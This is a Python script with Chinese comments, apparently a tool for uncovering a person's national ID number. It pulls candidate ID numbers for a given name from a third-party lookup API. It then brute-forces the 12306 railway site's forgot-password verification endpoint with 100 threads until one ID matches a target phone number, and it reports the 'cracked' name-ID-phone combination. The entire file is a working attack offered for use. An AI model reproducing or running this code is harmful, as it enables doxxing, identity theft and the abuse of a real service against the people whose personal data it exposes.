import requests
from urllib.parse import urlencode, quote
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Event
import re
import sys

# 常量定义
MAX_WORKERS = 100  # 最大线程数
RETRY_TIMES = 3    # 网络请求重试次数
TIMEOUT = 8        # 请求超时时间

class Color:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    END = '\033[0m'

def get_original_cookies():
    """获取初始Cookie（带重试机制）"""
    url = "https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword"
    for _ in range(RETRY_TIMES):
        try:
            response = requests.get(url, timeout=TIMEOUT)
            response.raise_for_status()
            return response.cookies
        except Exception as e:
            print(f"{Color.RED}获取Cookie失败，重试中... ({_+1}/{RETRY_TIMES}){Color.END}")
            time.sleep(1)
    return None

def validate_phone(phone):
    """验证手机号格式"""
    return re.match(r'^1[3-9]\d{9}$', phone) is not None

def validate_name(name):
    """验证姓名格式（中文姓名2-4字）"""
    return re.match(r'^[\u4e00-\u9fa5]{2,4}$', name) is not None

def get_id_cards():
    """获取身份证列表（最终修复版）"""
    while True:
        name = input("请输入姓名：")
        if validate_name(name):
            break
        print(f"{Color.RED}姓名格式错误，请输入2-4位中文姓名{Color.END}")

    while True:
        prefix = input("请输入身份证前两位: ").strip()
        if prefix == '0':
            break
        if len(prefix) == 2 and prefix.isdigit():
            break
        print(f"{Color.RED}请输入两位数字或0{Color.END}")

    # 生成符合API要求的身份证模板
    if prefix == '0':
        card_pattern = 'x'*18
    else:
        card_pattern = prefix + 'x'*16  # 正确格式：前两位+16个x
    
    encoded_name = quote(name.encode('utf-8'))
    api_url = f"http://n6n6n6.top/api/buqi/bq2.php?name={encoded_name}&idcard={card_pattern}&token=mozhengdi"

    print(f"{Color.BLUE}正在请求API接口...{Color.END}")
    for _ in range(RETRY_TIMES):
        try:
            response = requests.get(api_url, timeout=TIMEOUT)
            response.raise_for_status()
            
            # 调试输出原始响应
            print(f"{Color.BLUE}原始响应数据:{Color.END}\n{response.text[:200]}...")

            # 改进的正则表达式匹配
            id_cards = re.findall(r'\b\d{17}[\dXx]\b', response.text)
            if not id_cards:
                id_cards = re.findall(r'(\d{16,18}[Xx]?)', response.text)
            
            valid_cards = []
            for card in id_cards:
                # 标准化处理
                card = card.upper().ljust(18, 'X')[:18]
                if len(card) == 18:
                    valid_cards.append(card)
            
            if valid_cards:
                with open('sfz.txt', 'w', encoding='utf-8') as f:
                    f.write('\n'.join(valid_cards))
                
                print(f"{Color.GREEN}成功获取有效身份证 {len(valid_cards)} 个{Color.END}")
                return name
                
            print(f"{Color.RED}未找到有效身份证，可能原因：\n1. API服务异常\n2. 输入条件无匹配结果\n3. 响应格式发生变化{Color.END}")
            return None
            
        except Exception as e:
            print(f"{Color.RED}API请求失败: {str(e)}，重试中... ({_+1}/{RETRY_TIMES}){Color.END}")
            time.sleep(2)
    
    return None

def verify_id(card, mobile, cookies, headers, url, stop_event):
    """执行验证（增强版）"""
    if stop_event.is_set():
        return None

    data = {
        "mobile_no": mobile,
        "loginUserDTO.mobile_code": "86",
        "loginUserDTO.id_type_code": "1",
        "loginUserDTO.id_no": card.strip()
    }

    for _ in range(RETRY_TIMES):
        try:
            response = requests.post(
                url,
                headers=headers,
                data=urlencode(data),
                cookies=cookies,
                timeout=TIMEOUT
            )
            response.raise_for_status()
            
            result = response.json()
            if result.get('data', {}).get('errorMsg') is None:
                return card.strip(), True
            return card.strip(), False
            
        except requests.exceptions.RequestException as e:
            print(f"{Color.YELLOW}验证 {card.strip()} 时发生网络错误: {str(e)}{Color.END}")
        except Exception as e:
            print(f"{Color.RED}验证 {card.strip()} 时发生意外错误: {str(e)}{Color.END}")
    
    return card.strip(), False

def main():
    print(f"{Color.BLUE}大爱出品全自动支机{Color.END}")
    
    # 第一步：获取有效身份证列表
    name = get_id_cards()
    if not name:
        return

    # 第二步：获取并验证手机号
    while True:
        mobile = input("请输入手机号: ")
        if validate_phone(mobile):
            break
        print(f"{Color.RED}手机号格式错误，请重新输入{Color.END}")

    # 第三步：获取Cookie
    cookies = get_original_cookies()
    if not cookies:
        print(f"{Color.RED}无法获取初始Cookie，请检查网络连接{Color.END}")
        return

    headers = {
        "Host": "kyfw.12306.cn",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Referer": "https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword",
    }

    url = "https://kyfw.12306.cn/otn/forgetPassword/checkUserInfo"
    stop_event = Event()
    start_time = time.time()

    try:
        with open('sfz.txt', 'r', encoding='utf-8') as f:
            cards = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"{Color.RED}身份证文件不存在，请检查sfz.txt{Color.END}")
        return

    success_result = None
    processed = 0
    total = len(cards)

    print(f"\n{Color.BLUE}开始验证（共 {total} 个身份证）...{Color.END}")

    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = []
        for card in cards:
            if stop_event.is_set():
                break
            futures.append(executor.submit(
                verify_id, 
                card, 
                mobile, 
                cookies, 
                headers, 
                url, 
                stop_event
            ))

        for future in as_completed(futures):
            processed += 1
            if processed % 10 == 0:
                elapsed = time.time() - start_time
                speed = processed / elapsed if elapsed > 0 else 0
                remain = (total - processed) / speed if speed > 0 else 0
                print(f"\r进度: {processed}/{total} | 速度: {speed:.1f}次/秒 | 剩余时间: {remain:.1f}秒", end="")
                sys.stdout.flush()

            result = future.result()
            if not result:
                continue

            card, is_success = result
            if is_success:
                success_result = f"{name}-{card}-{mobile}"
                stop_event.set()
                break
            else:
                print(f"\r{card}-{mobile} 核验失败❌{' '*20}")

    print("\n\n" + "="*40)
    if success_result:
        print(f"{Color.GREEN}破解成功！✅\n结果: {success_result}{Color.END}")
        with open('成功.txt', 'w', encoding='utf-8') as f:
            f.write(success_result)
    else:
        print(f"{Color.RED}未找到匹配的身份证信息 ❌{Color.END}")

    elapsed = time.time() - start_time
    print(f"{Color.BLUE}总用时: {elapsed:.2f}秒{Color.END}")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n{Color.RED}用户中断操作，程序退出{Color.END}")